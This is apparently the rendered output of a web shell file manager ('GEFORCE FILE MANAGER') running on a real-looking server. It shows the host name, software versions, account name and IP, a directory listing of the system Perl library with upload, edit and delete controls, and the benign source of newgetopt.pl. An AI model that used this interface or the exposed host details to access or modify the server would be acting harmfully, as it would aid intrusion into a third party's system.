[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
share
/
perl5
/
vendor_perl
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Algorithm
SET
[ DEL ]
📁 App
SET
[ DEL ]
📁 Archive
SET
[ DEL ]
📁 Authen
SET
[ DEL ]
📁 B
SET
[ DEL ]
📁 CPAN
SET
[ DEL ]
📁 Carp
SET
[ DEL ]
📁 Config
SET
[ DEL ]
📁 Data
SET
[ DEL ]
📁 Date
SET
[ DEL ]
📁 Digest
SET
[ DEL ]
📁 Encode
SET
[ DEL ]
📁 Exporter
SET
[ DEL ]
📁 ExtUtils
SET
[ DEL ]
📁 File
SET
[ DEL ]
📁 Filter
SET
[ DEL ]
📁 Getopt
SET
[ DEL ]
📁 HTML
SET
[ DEL ]
📁 HTTP
SET
[ DEL ]
📁 IO
SET
[ DEL ]
📁 IPC
SET
[ DEL ]
📁 JSON
SET
[ DEL ]
📁 LWP
SET
[ DEL ]
📁 Locale
SET
[ DEL ]
📁 MRO
SET
[ DEL ]
📁 Math
SET
[ DEL ]
📁 Module
SET
[ DEL ]
📁 Mozilla
SET
[ DEL ]
📁 Net
SET
[ DEL ]
📁 POD2
SET
[ DEL ]
📁 Package
SET
[ DEL ]
📁 Params
SET
[ DEL ]
📁 Parse
SET
[ DEL ]
📁 Perl
SET
[ DEL ]
📁 PerlIO
SET
[ DEL ]
📁 Pod
SET
[ DEL ]
📁 Software
SET
[ DEL ]
📁 Sub
SET
[ DEL ]
📁 TAP
SET
[ DEL ]
📁 Term
SET
[ DEL ]
📁 Test
SET
[ DEL ]
📁 Test2
SET
[ DEL ]
📁 Text
SET
[ DEL ]
📁 Thread
SET
[ DEL ]
📁 Time
SET
[ DEL ]
📁 Try
SET
[ DEL ]
📁 Types
SET
[ DEL ]
📁 WWW
SET
[ DEL ]
📁 autodie
SET
[ DEL ]
📁 inc
SET
[ DEL ]
📁 lib
SET
[ DEL ]
📁 libwww
SET
[ DEL ]
📁 local
SET
[ DEL ]
📄 CPAN.pm
141,325 B
SET
[ EDIT ]
|
[ DEL ]
📄 Carp.pm
31,043 B
SET
[ EDIT ]
|
[ DEL ]
📄 Digest.pm
10,706 B
SET
[ EDIT ]
|
[ DEL ]
📄 Env.pm
5,524 B
SET
[ EDIT ]
|
[ DEL ]
📄 Expect.pm
100,447 B
SET
[ EDIT ]
|
[ DEL ]
📄 Exporter.pm
18,746 B
SET
[ EDIT ]
|
[ DEL ]
📄 Fatal.pm
58,176 B
SET
[ EDIT ]
|
[ DEL ]
📄 LWP.pm
21,676 B
SET
[ EDIT ]
|
[ DEL ]
📄 Test2.pm
6,393 B
SET
[ EDIT ]
|
[ DEL ]
📄 autodie.pm
12,886 B
SET
[ EDIT ]
|
[ DEL ]
📄 bigint.pm
23,398 B
SET
[ EDIT ]
|
[ DEL ]
📄 bignum.pm
21,137 B
SET
[ EDIT ]
|
[ DEL ]
📄 bigrat.pm
16,154 B
SET
[ EDIT ]
|
[ DEL ]
📄 constant.pm
14,724 B
SET
[ EDIT ]
|
[ DEL ]
📄 experimental.pm
6,993 B
SET
[ EDIT ]
|
[ DEL ]
📄 newgetopt.pl
2,206 B
SET
[ EDIT ]
|
[ DEL ]
📄 ok.pm
967 B
SET
[ EDIT ]
|
[ DEL ]
📄 parent.pm
2,575 B
SET
[ EDIT ]
|
[ DEL ]
📄 perldoc.pod
9,376 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq.pm
77 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq.pod
22,757 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq1.pod
14,457 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq2.pod
9,466 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq3.pod
37,535 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq4.pod
89,399 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq5.pod
55,506 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq6.pod
39,618 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq7.pod
37,816 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq8.pod
50,105 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlfaq9.pod
14,847 B
SET
[ EDIT ]
|
[ DEL ]
📄 perlglossary.pod
137,232 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: newgetopt.pl
# Id: newgetopt.pl,v 1.18 2001/09/21 13:34:59 jv # This library is no longer being maintained, and is included for backward # compatibility with Perl 4 programs which may require it. # It is now just a wrapper around the Getopt::Long module. # # In particular, this should not be used as an example of modern Perl # programming techniques. # # Suggested alternative: Getopt::Long { package newgetopt; # Values for $order. See GNU getopt.c for details. $REQUIRE_ORDER = 0; $PERMUTE = 1; $RETURN_IN_ORDER = 2; # Handle POSIX compliancy. if ( defined $ENV{"POSIXLY_CORRECT"} ) { $autoabbrev = 0; # no automatic abbrev of options (???) $getopt_compat = 0; # disallow '+' to start options $option_start = "(--|-)"; $order = $REQUIRE_ORDER; $bundling = 0; $passthrough = 0; } else { $autoabbrev = 1; # automatic abbrev of options $getopt_compat = 1; # allow '+' to start options $option_start = "(--|-|\\+)"; $order = $PERMUTE; $bundling = 0; $passthrough = 0; } # Other configurable settings. $debug = 0; # for debugging $ignorecase = 1; # ignore case when matching options $argv_end = "--"; # don't change this! } use Getopt::Long; ################ Subroutines ################ sub NGetOpt { $Getopt::Long::debug = $newgetopt::debug if defined $newgetopt::debug; $Getopt::Long::autoabbrev = $newgetopt::autoabbrev if defined $newgetopt::autoabbrev; $Getopt::Long::getopt_compat = $newgetopt::getopt_compat if defined $newgetopt::getopt_compat; $Getopt::Long::option_start = $newgetopt::option_start if defined $newgetopt::option_start; $Getopt::Long::order = $newgetopt::order if defined $newgetopt::order; $Getopt::Long::bundling = $newgetopt::bundling if defined $newgetopt::bundling; $Getopt::Long::ignorecase = $newgetopt::ignorecase if defined $newgetopt::ignorecase; $Getopt::Long::ignorecase = $newgetopt::ignorecase if defined $newgetopt::ignorecase; $Getopt::Long::passthrough = $newgetopt::passthrough if defined $newgetopt::passthrough; &GetOptions; } ################ Package return ################ 1; ################ End of newgetopt.pl ################